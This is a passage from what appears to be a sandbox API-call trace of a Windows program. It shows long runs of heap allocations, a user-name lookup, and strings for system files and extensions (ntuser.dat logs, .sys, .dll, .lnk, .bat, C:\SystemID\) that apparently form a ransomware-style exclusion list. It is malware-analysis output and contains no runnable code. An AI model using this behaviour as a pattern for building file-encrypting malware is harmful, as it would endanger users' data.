(in: hHeap=0x620000, dwFlags=0x0, lpMem=0x69cdc8 | out: hHeap=0x620000) returned 1 [0182.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x659118 [0182.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccab30 [0182.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4520 [0182.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x138) returned 0x655b18 [0182.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6e2c38 | out: hHeap=0x620000) returned 1 [0182.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdd870 [0182.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccab88 [0182.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccabe0 [0182.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdd8b8 [0182.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c8) returned 0x2cb1df0 [0182.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x655b18 | out: hHeap=0x620000) returned 1 [0182.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6597a8 | out: hHeap=0x620000) returned 1 [0182.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0182.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb44b8 | out: hHeap=0x620000) returned 1 [0182.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdd7e0 | out: hHeap=0x620000) returned 1 [0182.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0182.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaad8 | out: hHeap=0x620000) returned 1 [0182.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdd828 | out: hHeap=0x620000) returned 1 [0182.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x659118 | out: hHeap=0x620000) returned 1 [0182.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccab30 | out: hHeap=0x620000) returned 1 [0182.182] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4520 | out: hHeap=0x620000) returned 1 [0182.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdd870 | out: hHeap=0x620000) returned 1 [0182.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccab88 | out: hHeap=0x620000) returned 1 [0182.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccabe0 | out: hHeap=0x620000) returned 1 [0182.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdd8b8 | out: hHeap=0x620000) returned 1 [0182.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb1df0 | out: hHeap=0x620000) returned 1 [0182.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x28) returned 0x2cff180 [0182.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c918e8 [0182.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c91b50 [0182.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c91db8 [0182.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c92020 [0182.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c92288 [0182.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c924f0 [0182.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c9ede8 [0182.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c9f050 [0182.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c9f2b8 [0182.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c9f520 [0182.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0182.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x130) returned 0x655b18 [0182.185] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0182.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1d0) returned 0x2d03058 [0182.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x655b18 | out: hHeap=0x620000) returned 1 [0182.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2b7) returned 0x678140 [0182.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d03058 | out: hHeap=0x620000) returned 1 [0182.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x412) returned 0x2d0c3c8 [0182.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x678140 | out: hHeap=0x620000) returned 1 [0182.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x61a) returned 0x2d0de30 [0182.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0182.188] GetUserNameW (in: lpBuffer=0x18ec50, pcbBuffer=0x18eac4 | out: lpBuffer="kEecfMwgj", pcbBuffer=0x18eac4) returned 1 [0182.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x590) returned 0x2d0c3c8 [0182.191] GetLastError () returned 0x0 [0182.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x646348 [0182.191] GetLastError () returned 0x0 [0182.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x669238 [0182.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646348 | out: hHeap=0x620000) returned 1 [0182.191] GetLastError () returned 0x0 [0182.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x48) returned 0x2ccbb98 [0182.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x669238 | out: hHeap=0x620000) returned 1 [0182.192] GetLastError () returned 0x0 [0182.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4520 [0182.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccbb98 | out: hHeap=0x620000) returned 1 [0182.192] GetLastError () returned 0x0 [0182.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x69cdc8 [0182.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4520 | out: hHeap=0x620000) returned 1 [0182.193] GetLastError () returned 0x0 [0182.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd8) returned 0x6e2c38 [0182.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x69cdc8 | out: hHeap=0x620000) returned 1 [0182.193] GetLastError () returned 0x0 [0182.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x138) returned 0x655b18 [0182.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6e2c38 | out: hHeap=0x620000) returned 1 [0182.193] GetLastError () returned 0x0 [0182.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x659118 [0182.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c8) returned 0x2cb1df0 [0182.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x655b18 | out: hHeap=0x620000) returned 1 [0182.194] GetLastError () returned 0x0 [0182.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6597a8 [0182.194] GetLastError () returned 0x0 [0182.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94528 [0182.194] GetLastError () returned 0x0 [0182.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94640 [0182.194] GetLastError () returned 0x0 [0182.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94708 [0182.194] GetLastError () returned 0x0 [0182.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2a0) returned 0x678140 [0182.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb1df0 | out: hHeap=0x620000) returned 1 [0182.195] GetLastError () returned 0x0 [0182.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c949b0 [0182.195] GetLastError () returned 0x0 [0182.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x669238 [0182.195] GetLastError () returned 0x0 [0182.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9098 [0182.195] GetLastError () returned 0x0 [0182.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c949d8 [0182.195] GetLastError () returned 0x0 [0182.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94a00 [0182.195] GetLastError () returned 0x0 [0182.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94a28 [0182.196] GetLastError () returned 0x0 [0182.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94a50 [0182.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f0) returned 0x6756a8 [0182.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x678140 | out: hHeap=0x620000) returned 1 [0182.196] GetLastError () returned 0x0 [0182.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94a78 [0182.196] GetLastError () returned 0x0 [0182.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94aa0 [0182.196] GetLastError () returned 0x0 [0182.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94ac8 [0182.196] GetLastError () returned 0x0 [0182.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9178 [0182.196] GetLastError () returned 0x0 [0182.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9450 [0182.197] GetLastError () returned 0x0 [0182.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94af0 [0182.197] GetLastError () returned 0x0 [0182.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94b18 [0182.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e8) returned 0x2c44bd8 [0182.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6756a8 | out: hHeap=0x620000) returned 1 [0182.197] GetLastError () returned 0x0 [0182.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94b40 [0182.197] GetLastError () returned 0x0 [0182.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94b68 [0182.198] GetLastError () returned 0x0 [0182.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94b90 [0182.198] GetLastError () returned 0x0 [0182.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94bb8 [0182.198] GetLastError () returned 0x0 [0182.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94be0 [0182.198] GetLastError () returned 0x0 [0182.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94c08 [0182.198] GetLastError () returned 0x0 [0182.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd93e0 [0182.198] GetLastError () returned 0x0 [0182.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9488 [0182.198] GetLastError () returned 0x0 [0182.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94c30 [0182.198] GetLastError () returned 0x0 [0182.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94c58 [0182.198] GetLastError () returned 0x0 [0182.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94c80 [0182.198] GetLastError () returned 0x0 [0182.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94ca8 [0182.199] GetLastError () returned 0x0 [0182.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94cd0 [0182.199] GetLastError () returned 0x0 [0182.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94cf8 [0182.199] GetLastError () returned 0x0 [0182.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8d0) returned 0x2d05040 [0182.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c44bd8 | out: hHeap=0x620000) returned 1 [0182.199] GetLastError () returned 0x0 [0182.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94d20 [0182.199] GetLastError () returned 0x0 [0182.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94d48 [0182.200] GetLastError () returned 0x0 [0182.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd94c0 [0182.200] GetLastError () returned 0x0 [0182.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd94f8 [0182.200] GetLastError () returned 0x0 [0182.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94d70 [0182.200] GetLastError () returned 0x0 [0182.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94d98 [0182.200] GetLastError () returned 0x0 [0182.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94dc0 [0182.200] GetLastError () returned 0x0 [0182.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94de8 [0182.200] GetLastError () returned 0x0 [0182.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e10 [0182.200] GetLastError () returned 0x0 [0182.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e60 | out: hHeap=0x620000) returned 1 [0182.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e38 | out: hHeap=0x620000) returned 1 [0182.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x81e) returned 0x2d06960 [0182.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2d06960, cchWideChar=1039 | out: lpWideCharStr="ntuser.dat.LOG1") returned 16 [0182.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2d07188 [0182.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d06960 | out: hHeap=0x620000) returned 1 [0182.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9530 [0182.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646348 | out: hHeap=0x620000) returned 1 [0182.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e38 [0182.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e60 [0182.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e60 | out: hHeap=0x620000) returned 1 [0182.216] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e38 | out: hHeap=0x620000) returned 1 [0182.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x81e) returned 0x2d06960 [0182.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2d06960, cchWideChar=1039 | out: lpWideCharStr="ntuser.dat.LOG2") returned 16 [0182.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2d079b0 [0182.216] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d06960 | out: hHeap=0x620000) returned 1 [0182.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x48) returned 0x2ccbb98 [0182.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9530 | out: hHeap=0x620000) returned 1 [0182.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e38 [0182.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e60 [0182.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e60 | out: hHeap=0x620000) returned 1 [0182.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e38 | out: hHeap=0x620000) returned 1 [0182.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x814) returned 0x2d05918 [0182.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2d05918, cchWideChar=1034 | out: lpWideCharStr="ntuser.pol") returned 11 [0182.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2d06960 [0182.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d05918 | out: hHeap=0x620000) returned 1 [0182.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4520 [0182.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccbb98 | out: hHeap=0x620000) returned 1 [0182.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e38 [0182.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e60 [0182.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e60 | out: hHeap=0x620000) returned 1 [0182.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e38 | out: hHeap=0x620000) returned 1 [0182.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x808) returned 0x2d05918 [0182.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2d05918, cchWideChar=1028 | out: lpWideCharStr=".sys") returned 5 [0182.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2d081d8 [0182.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d05918 | out: hHeap=0x620000) returned 1 [0182.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x69cdc8 [0182.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4520 | out: hHeap=0x620000) returned 1 [0182.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e38 [0182.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e60 [0182.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e60 | out: hHeap=0x620000) returned 1 [0182.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e38 | out: hHeap=0x620000) returned 1 [0182.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x808) returned 0x2d05918 [0182.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2d05918, cchWideChar=1028 | out: lpWideCharStr=".ini") returned 5 [0182.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2d089f0 [0182.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d05918 | out: hHeap=0x620000) returned 1 [0182.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e38 [0182.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e60 [0182.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e60 | out: hHeap=0x620000) returned 1 [0182.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e38 | out: hHeap=0x620000) returned 1 [0182.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x808) returned 0x2d05918 [0182.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2d05918, cchWideChar=1028 | out: lpWideCharStr=".DLL") returned 5 [0182.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2d09208 [0182.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d05918 | out: hHeap=0x620000) returned 1 [0182.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd8) returned 0x6e2c38 [0182.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x69cdc8 | out: hHeap=0x620000) returned 1 [0182.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e38 [0182.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e60 [0182.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e60 | out: hHeap=0x620000) returned 1 [0182.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e38 | out: hHeap=0x620000) returned 1 [0182.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x808) returned 0x2d05918 [0182.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2d05918, cchWideChar=1028 | out: lpWideCharStr=".dll") returned 5 [0182.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2d09a20 [0182.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d05918 | out: hHeap=0x620000) returned 1 [0182.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e38 [0182.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e60 [0182.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e60 | out: hHeap=0x620000) returned 1 [0182.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e38 | out: hHeap=0x620000) returned 1 [0182.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x808) returned 0x2d05918 [0182.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2d05918, cchWideChar=1028 | out: lpWideCharStr=".blf") returned 5 [0182.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e30048 [0182.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d05918 | out: hHeap=0x620000) returned 1 [0182.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e38 [0182.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e60 [0182.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e60 | out: hHeap=0x620000) returned 1 [0182.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e38 | out: hHeap=0x620000) returned 1 [0182.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x808) returned 0x2d05918 [0182.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2d05918, cchWideChar=1028 | out: lpWideCharStr=".bat") returned 5 [0182.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e30860 [0182.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d05918 | out: hHeap=0x620000) returned 1 [0182.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x138) returned 0x2d0a238 [0182.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6e2c38 | out: hHeap=0x620000) returned 1 [0182.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e38 [0182.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e60 [0182.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e60 | out: hHeap=0x620000) returned 1 [0182.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e38 | out: hHeap=0x620000) returned 1 [0182.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x808) returned 0x2d05918 [0182.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2d05918, cchWideChar=1028 | out: lpWideCharStr=".lnk") returned 5 [0182.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e31078 [0182.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d05918 | out: hHeap=0x620000) returned 1 [0182.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e38 [0182.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e60 [0182.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e60 | out: hHeap=0x620000) returned 1 [0182.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e38 | out: hHeap=0x620000) returned 1 [0182.230] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x818) returned 0x2d05918 [0182.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2d05918, cchWideChar=1036 | out: lpWideCharStr=".regtrans-ms") returned 13 [0182.230] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e31890 [0182.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d05918 | out: hHeap=0x620000) returned 1 [0182.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e38 [0182.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e60 [0182.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e60 | out: hHeap=0x620000) returned 1 [0182.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e38 | out: hHeap=0x620000) returned 1 [0182.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x818) returned 0x2d05918 [0182.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ea50, cbMultiByte=-1, lpWideCharStr=0x2d05918, cchWideChar=1036 | out: lpWideCharStr="C:\\SystemID\\") returned 13 [0182.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e320b8 [0182.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d05918 | out: hHeap=0x620000) returned 1 [0182.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e38 [0182.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e60 [0182.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e60 | out: hHeap=0x620000) returned 1 [0182.233] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c94e38 | out: hHeap=0x620000) returned 1 [0182.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2c94e38 [0182.233] RtlAllocateHeap 